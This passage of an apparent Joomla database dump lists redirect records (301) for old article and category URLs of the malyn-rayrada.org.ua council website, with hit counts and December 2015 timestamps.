20:40:47','0000-00-00 00:00:00',301),(20118,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1338:2014-06-11-14-18-06&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 20:43:33','0000-00-00 00:00:00',301),(20119,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=584:-20-2011-100-l-r-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 20:46:00','0000-00-00 00:00:00',301),(20120,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=313:-2011-2015-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 20:47:06','0000-00-00 00:00:00',301),(20121,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 20:48:24','0000-00-00 00:00:00',301),(20122,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=704:--------20--2011--108-l---r----&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 20:49:50','0000-00-00 00:00:00',301),(20123,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:51:40','0000-00-00 00:00:00',301),(20124,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1325:2014-05-29-06-00-31&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-10 20:53:32','0000-00-00 00:00:00',301),(20125,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1150:2013-11-28-14-53-17&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:54:34','0000-00-00 00:00:00',301),(20126,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1140:80-1932-33-l-r&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:56:31','0000-00-00 00:00:00',301),(20127,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=760:-qq-24-2012-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:57:22','0000-00-00 00:00:00',301),(20128,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-10 20:57:32','0000-00-00 00:00:00',301),(20129,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 20:57:42','0000-00-00 00:00:00',301),(20130,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=808:2012-10-30-13-56-37&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:01:46','0000-00-00 00:00:00',301),(20131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-12-10 21:05:18','0000-00-00 00:00:00',301),(20132,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=817:---------------l--r&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:06:46','0000-00-00 00:00:00',301),(20133,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=317:-l-2008-2012-r&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:13:09','0000-00-00 00:00:00',301),(20134,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=309:----5----6--20--2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:13:38','0000-00-00 00:00:00',301),(20135,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=480:2011-11-28-10-11-58&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:15:23','0000-00-00 00:00:00',301),(20136,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:17:11','0000-00-00 00:00:00',301),(20137,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=912:2013-01-22-14-14-06&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 21:17:58','0000-00-00 00:00:00',301),(20138,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:18:41','0000-00-00 00:00:00',301),(20139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=407:-l-r-2010-2015-&lang=uk&option=com_content&view=article','','','',6,0,'2015-12-10 21:21:08','0000-00-00 00:00:00',301),(20140,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 21:23:50','0000-00-00 00:00:00',301),(20141,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:25:00','0000-00-00 00:00:00',301),(20142,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1297:2014-04-24-09-20-07&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2015-12-10 21:27:14','0000-00-00 00:00:00',301),(20143,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1147:2013-11-28-09-57-12&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:27:27','0000-00-00 00:00:00',301),(20144,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:27:39','0000-00-00 00:00:00',301),(20145,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=816:2012-11-14-16-33-01&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:27:49','0000-00-00 00:00:00',301),(20146,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=643:-6-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 21:27:59','0000-00-00 00:00:00',301),(20147,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=700:-2012-2015-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:28:03','0000-00-00 00:00:00',301),(20148,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 21:28:07','0000-00-00 00:00:00',301),(20149,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1088:2013-09-19-12-06-07&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:28:11','0000-00-00 00:00:00',301),(20150,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1301:-28-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-10 21:31:25','0000-00-00 00:00:00',301),(20151,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:37:09','0000-00-00 00:00:00',301),(20152,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 21:38:12','0000-00-00 00:00:00',301),(20153,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:39:19','0000-00-00 00:00:00',301),(20154,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 21:43:07','0000-00-00 00:00:00',301),(20155,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1155:2013-12-07-15-56-12&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:43:16','0000-00-00 00:00:00',301),(20156,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=441:-l-2011-2014-r-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:43:26','0000-00-00 00:00:00',301),(20157,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-10 21:43:36','0000-00-00 00:00:00',301),(20158,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=735:2012-07-18-13-32-43&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:45:05','0000-00-00 00:00:00',301),(20159,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1189:2014-01-28-09-46-45&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:46:05','0000-00-00 00:00:00',301),(20160,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1013:2013-06-01-03-58-38&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:46:14','0000-00-00 00:00:00',301),(20161,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1211:-2014-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:48:11','0000-00-00 00:00:00',301),(20162,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:48:21','0000-00-00 00:00:00',301),(20163,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1083:-2014-&Itemid=94&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 21:51:20','0000-00-00 00:00:00',301),(20164,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1190:-2014-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:51:32','0000-00-00 00:00:00',301),(20165,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=84&lang=uk&layout=blog&limitstart=30&option=com_content&view=category','','','',2,0,'2015-12-10 21:52:41','0000-00-00 00:00:00',301),(20166,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 21:54:40','0000-00-00 00:00:00',301),(20167,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1073:2013-08-30-11-12-19&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 21:57:05','0000-00-00 00:00:00',301),(20168,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 21:58:15','0000-00-00 00:00:00',301),(20169,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1023:-l-28r-&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 21:59:24','0000-00-00 00:00:00',301),(20170,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=721:-lr&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 22:00:21','0000-00-00 00:00:00',301),(20171,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=321:------------l---------r--2011-2016-&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 22:01:16','0000-00-00 00:00:00',301),(20172,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1188:2014-01-28-09-45-21&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 22:02:14','0000-00-00 00:00:00',301),(20173,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=995:-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 22:03:22','0000-00-00 00:00:00',301),(20174,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=774:2012-10-02-09-30-45&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 22:06:30','0000-00-00 00:00:00',301),(20175,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-10 22:07:16','0000-00-00 00:00:00',301),(20176,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1161:2013-12-18-13-34-32&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 22:08:14','0000-00-00 00:00:00',301),(20177,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=443:-2011-&Itemid=72&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 22:23:01','0000-00-00 00:00:00',301),(20178,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=784:-9-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 22:26:31','0000-00-00 00:00:00',301),(20179,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-10 22:29:14','0000-00-00 00:00:00',301),(20180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 22:33:03','0000-00-00 00:00:00',301),(20181,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-10 22:49:08','0000-00-00 00:00:00',301),(20182,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 22:50:57','0000-00-00 00:00:00',301),(20183,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=204:2010-12-15-14-13-07&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 22:52:41','0000-00-00 00:00:00',301),(20184,'http://www.malyn-rayrada.org.ua/index.php?id=58:--30042014-&Itemid=105&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-10 22:54:20','0000-00-00 00:00:00',301),(20185,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1356:2014-07-03-06-32-02&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 22:54:46','0000-00-00 00:00:00',301),(20186,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=349:--------20--2011--108-l---r&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 22:55:15','0000-00-00 00:00:00',301),(20187,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 23:00:23','0000-00-00 00:00:00',301),(20188,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1313:2014-05-14-10-00-55&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-10 23:05:10','0000-00-00 00:00:00',301),(20189,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=596:2012-02-28-12-59-05&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 23:07:03','0000-00-00 00:00:00',301),(20190,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1083:-2014-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 23:09:25','0000-00-00 00:00:00',301),(20191,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=514:2011-12-22-10-03-07&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 23:11:46','0000-00-00 00:00:00',301),(20192,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1008:2013-05-20-07-02-57&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 23:14:25','0000-00-00 00:00:00',301),(20193,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=475:2011-11-22-07-58-34&Itemid=70&lang=en&option=com_content&view=article','','','',4,0,'2015-12-10 23:16:31','0000-00-00 00:00:00',301),(20194,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=784:-9-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 23:20:05','0000-00-00 00:00:00',301),(20195,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=746:-2012-&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 23:22:41','0000-00-00 00:00:00',301),(20196,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=521:-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 23:25:05','0000-00-00 00:00:00',301),(20197,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&limitstart=40&option=com_content&view=category','','','',2,0,'2015-12-10 23:27:35','0000-00-00 00:00:00',301),(20198,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=616:----l-r&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 23:30:59','0000-00-00 00:00:00',301),(20199,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1152:2013-11-28-14-58-05&Itemid=95&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 23:32:32','0000-00-00 00:00:00',301),(20200,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 23:33:14','0000-00-00 00:00:00',301),(20201,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 23:33:42','0000-00-00 00:00:00',301),(20202,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=418:2011-09-29-08-40-03&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 23:33:52','0000-00-00 00:00:00',301),(20203,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=766:2012-09-28-08-37-31&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 23:40:29','0000-00-00 00:00:00',301),(20204,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=541:2012-01-26-11-55-32&Itemid=76&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 23:43:18','0000-00-00 00:00:00',301),(20205,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 23:48:48','0000-00-00 00:00:00',301),(20206,'http://www.malyn-rayrada.org.ua/index.php?id=35&Itemid=69&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-10 23:51:02','0000-00-00 00:00:00',301),(20207,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=644:2012-04-04-09-52-48&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 23:53:25','0000-00-00 00:00:00',301),(20208,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=209:2010-12-15-14-27-50&Itemid=60&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-10 23:55:21','0000-00-00 00:00:00',301),(20209,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=31&lang=uk&option=com_rd_sitemap&view=sitemap','','','',2,0,'2015-12-11 00:00:16','0000-00-00 00:00:00',301),(20210,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=758:--15---&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:01:38','0000-00-00 00:00:00',301),(20211,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=702:-2011-2013-&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:03:10','0000-00-00 00:00:00',301),(20212,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=205:--------2011--&Itemid=60&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:07:01','0000-00-00 00:00:00',301),(20213,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=696:-14-6-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:09:13','0000-00-00 00:00:00',301),(20214,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 00:11:09','0000-00-00 00:00:00',301),(20215,'http://www.malyn-rayrada.org.ua/index.php?catid=20:2010-06-07-09-15-05&id=186:-6-&Itemid=42&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:13:17','0000-00-00 00:00:00',301),(20216,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=884:2012-12-24-10-46-13&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:15:57','0000-00-00 00:00:00',301),(20217,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=793:2012-10-17-06-29-27&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:17:20','0000-00-00 00:00:00',301),(20218,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:18:03','0000-00-00 00:00:00',301),(20219,'http://www.malyn-rayrada.org.ua/index.php?catid=30:--30122010-&id=230:---3----6--30--2010-&Itemid=61&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:18:43','0000-00-00 00:00:00',301),(20220,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:19:11','0000-00-00 00:00:00',301),(20221,'http://www.malyn-rayrada.org.ua/index.php?catid=8&id=10:2010-06-05-15-11-20&Itemid=13&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:19:51','0000-00-00 00:00:00',301),(20222,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=197:-----l-r--2004-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:21:01','0000-00-00 00:00:00',301),(20223,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:21:56','0000-00-00 00:00:00',301),(20224,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 00:22:30','0000-00-00 00:00:00',301),(20225,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=613:2012-03-26-14-13-34&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:22:48','0000-00-00 00:00:00',301),(20226,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=589:2012-02-27-13-52-30&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:24:32','0000-00-00 00:00:00',301),(20227,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1185:2014-01-28-09-38-54&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:24:48','0000-00-00 00:00:00',301),(20228,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1305:-30----&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 00:26:07','0000-00-00 00:00:00',301),(20229,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=710:2012-06-14-15-07-29&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:26:23','0000-00-00 00:00:00',301),(20230,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1081:-2013-2017-&Itemid=94&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:26:37','0000-00-00 00:00:00',301),(20231,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=802:-i-i-i-i-i&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:26:55','0000-00-00 00:00:00',301),(20232,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=720:-l-r&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:27:11','0000-00-00 00:00:00',301),(20233,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:27:51','0000-00-00 00:00:00',301),(20234,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1308:2014-05-05-05-20-51&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 00:30:46','0000-00-00 00:00:00',301),(20235,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=633:-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:31:08','0000-00-00 00:00:00',301),(20236,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=758:--15---&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 00:31:46','0000-00-00 00:00:00',301),(20237,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=724:-27042012252&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:32:07','0000-00-00 00:00:00',301),(20238,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:32:27','0000-00-00 00:00:00',301),(20239,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:33:32','0000-00-00 00:00:00',301),(20240,'http://www.malyn-rayrada.org.ua/index.php?id=54:--29112013-&Itemid=95&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 00:34:02','0000-00-00 00:00:00',301),(20241,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=683:------------------------2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:35:14','0000-00-00 00:00:00',301),(20242,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=910:-22-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:36:16','0000-00-00 00:00:00',301),(20243,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1197:-l-r-&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:37:26','0000-00-00 00:00:00',301),(20244,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1157:-----------11--2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:38:10','0000-00-00 00:00:00',301),(20245,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:38:32','0000-00-00 00:00:00',301),(20246,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=589:2012-02-27-13-52-30&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:39:40','0000-00-00 00:00:00',301),(20247,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=631:-i-2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:40:38','0000-00-00 00:00:00',301),(20248,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1114:---------------lr---&Itemid=70&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 00:40:49','0000-00-00 00:00:00',301),(20249,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=520:-2012-2013-&Itemid=73&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 00:41:03','0000-00-00 00:00:00',301),(20250,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:41:14','0000-00-00 00:00:00',301),(20251,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:41:18','0000-00-00 00:00:00',301),(20252,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=190:2010-12-15-13-24-17&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:41:22','0000-00-00 00:00:00',301),(20253,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=808:2012-10-30-13-56-37&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:41:26','0000-00-00 00:00:00',301),(20254,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1138:------15112013&Itemid=18&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 00:41:51','0000-00-00 00:00:00',301),(20255,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=274:2011-03-28-08-22-32&Itemid=62&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:42:06','0000-00-00 00:00:00',301),(20256,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=316:-2011-2012-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:48:36','0000-00-00 